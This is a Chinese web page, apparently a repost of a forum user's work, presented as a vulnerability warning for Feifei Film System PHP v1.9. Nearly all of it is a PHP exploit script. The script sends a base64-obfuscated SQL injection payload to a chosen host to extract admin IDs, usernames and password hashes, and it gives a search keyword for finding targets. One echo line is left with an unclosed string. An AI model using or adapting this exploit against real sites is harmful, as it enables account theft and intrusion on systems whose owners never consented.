飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料

文章作者：honglousy

昨天整的 论坛旁站上的程序，发现用的人还真不少，

飞飞影视系统PHP版 v1.9 injection exploit漏洞预警

简单的写了个exp。无聊之作...

<?php

/**

*飞飞影视管理系统 SQL injection

*飞飞影视系统PHP版 v1.9 injection exploit

*by:www.08sec.com fans

*keyword "Powered bywww.ff84.com"

*/

error_reporting(E_ERROR);

set_time_limit(0);

if ($argc<3) {

print_r('

------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname),without"http://"

path: path to ff84cms

Example:

php '.$argv[0].' localhost /

-------------------------------------------------------

');

die;

}

$host=$argv[1];

$path=$argv[2];

$html='';

$cookie="";

$agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";

$content ="";

$data = "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

//$data .="Cookie: ".$cookie."\r\n";

$data .= "User-Agent: ".$agent. "\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Encoding: gzip,deflate\r\n";

$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

Sendpack($data);

if (!eregi("Tpl",$html)){

// echo $packet."\r\n";

// echo $html."\r\n";

die("Exploit failed...");

}else{

$pattern="/@(.*)@/i";

preg_match($pattern,$html,$pg);

echo "$pg[1]\r\n\r\n

echo "\r\nExploit succeeded...\r\n";

}

Function sendpack ($packet)

{

global$host, $html;

$ock=fsockopen(gethostbyname($host),'80');

if (!$ock) {

echo 'No response from '.$host; die;

}

fputs($ock,$packet);

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}